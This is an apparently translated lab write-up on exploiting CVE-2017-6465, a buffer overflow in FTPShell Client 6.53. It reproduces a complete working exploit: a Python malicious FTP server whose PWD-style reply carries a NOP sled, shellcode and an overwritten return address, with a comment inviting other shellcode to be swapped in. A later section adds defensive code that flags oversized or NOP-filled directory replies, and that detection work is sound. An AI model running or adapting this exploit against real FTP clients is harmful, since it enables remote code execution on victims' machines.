Exploiting the CVE-2017-6465 buffer overflow in FTPShell Client 6.53

Source: Internet
Author: User
Tags: cve

0x00. Preface

FTPShell is a popular FTP tool for the Windows platform; the latest client version at the time of writing is 6.53: http://www.ftpshell.com/downloadclient.htm

Lab Environment: VMWare + WinXP SP3 EN

Vulnerable application download address: http://www.ftpshell.com/downloadclient.htm

0x01. Exploitation

The buffer overflow occurs while the client is setting up the initial connection and authentication with the FTP server. First, install FTPShell Client 6.53 in the lab environment.

Here the malicious FTP server is built directly from the Python exploit code published on exploit-db:

```python
#!/usr/bin/env python2
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server R2 x64
# Tested on: Windows Server R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing

import socket
import sys

# Shellcode that launches calc.exe (replace with other shellcode if needed)
shell = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
         "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
         "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
         "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
         "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
         "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
         "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
         "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
         "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
         "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
         "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
         "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
         "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
         "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
         "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
         "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
         "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
         "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
         "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
         "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
         "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
         "\x4e\x36\x43\x46\x42\x50\x5a")

port = 21
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))   # bind to port 21
    s.listen(5)                 # start listening as an FTP service
    print("[i] FTP server started on port: " + str(port) + "\r\n")
except:
    print("[!] Failed to bind the server to port: " + str(port) + "\r\n")

# 004B95DC in FTPShell.exe: PUSH ESI; RETN
# Only three address bytes are sent; the string's terminating NUL supplies the 0x00 high byte
EIP = "\xdc\x95\x4b"    # this address can still be used on WinXP SP3 EN
nops = "\x90" * 8
junk = "A" * (400 - len(nops) - len(shell))
buffer = nops + shell + junk + EIP   # construct the malicious buffer

while True:
    conn, addr = s.accept()
    conn.send('Welcome to your unfriendly FTP server\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('OK\r\n')
    print(conn.recv(1024))
    conn.send('"' + buffer + '" is current directory\r\n')   # send the malicious buffer
```

Run the script to start the malicious server.

When the FTPShell client on the victim machine connects to the malicious FTP server, the client crashes immediately and the shellcode is executed.
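As an added example (not part of the original post or of the exploit-db code), the following Python 3 snippet shows the check a defender, an FTP proxy, or a hardened client would apply to the server's PWD-style reply that this exploit abuses: it extracts the quoted directory name from the "... is current directory" line and flags replies whose path is longer than a sane limit, contains non-printable bytes, or carries a run of 0x90 bytes. The 260-byte limit, the function names and the sample reply lines are assumptions constructed for this example.

```python
import re

# Assumed limit (not from the original post): Windows MAX_PATH, far below the
# roughly 400-byte buffer the exploit above overflows.
MAX_PATH_LEN = 260

# RFC 959 PWD reply: 257 "<path>" is current directory, with embedded quotes doubled.
# The exploit above sends the same shape without the 3-digit code, so the code is optional.
PWD_REPLY = re.compile(rb'^(?:\d{3}[ -])?"(?P<path>(?:[^"]|"")*)" is current directory\.?\r?\n?$')


def extract_pwd_path(line: bytes):
    """Return the quoted path from a PWD-style reply, or None if the line is not one."""
    m = PWD_REPLY.match(line)
    return m.group("path") if m else None


def check_pwd_path(path: bytes) -> list:
    """Return the reasons a quoted path looks like an overflow attempt (empty list if clean)."""
    reasons = []
    if len(path) > MAX_PATH_LEN:
        reasons.append("quoted path is %d bytes (limit %d)" % (len(path), MAX_PATH_LEN))
    if any(b < 0x20 or b > 0x7E for b in path):
        reasons.append("quoted path contains non-printable bytes")
    if b"\x90" * 4 in path:
        reasons.append("quoted path contains a run of 0x90 bytes (NOP sled pattern)")
    return reasons


def flag_suspicious(lines) -> list:
    """Scan captured server reply lines; return (index, reasons) for suspicious PWD replies."""
    flagged = []
    for i, line in enumerate(lines):
        path = extract_pwd_path(line)
        if path is None:
            continue            # not a PWD reply: nothing to check on this line
        reasons = check_pwd_path(path)
        if reasons:
            flagged.append((i, reasons))
    return flagged


# Constructed sample replies (not captured traffic). Entry 2 mimics the shape of the
# malicious reply above using a NOP run plus filler instead of real shellcode.
SAMPLE_REPLIES = [
    b"220 Welcome to the FTP server\r\n",
    b'257 "/home/alice" is current directory\r\n',
    b'"' + b"\x90" * 8 + b"A" * 395 + b'" is current directory\r\n',
    b'257 "' + b"A" * 300 + b'" is current directory\r\n',
]

if __name__ == "__main__":
    for index, reasons in flag_suspicious(SAMPLE_REPLIES):
        print("reply %d suspicious: %s" % (index, "; ".join(reasons)))
```

A client that applied `check_pwd_path` (or simply a bounded copy with the same length limit) before storing the directory name would reject the 403-byte reply instead of overrunning its fixed buffer; the same logic run over captured control-channel traffic gives a simple detection for this class of malicious-server attack.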

Note: I did not test this on Win2008 SP2.

0x02. References

exploit-db: https://www.exploit-db.com/exploits/41511/
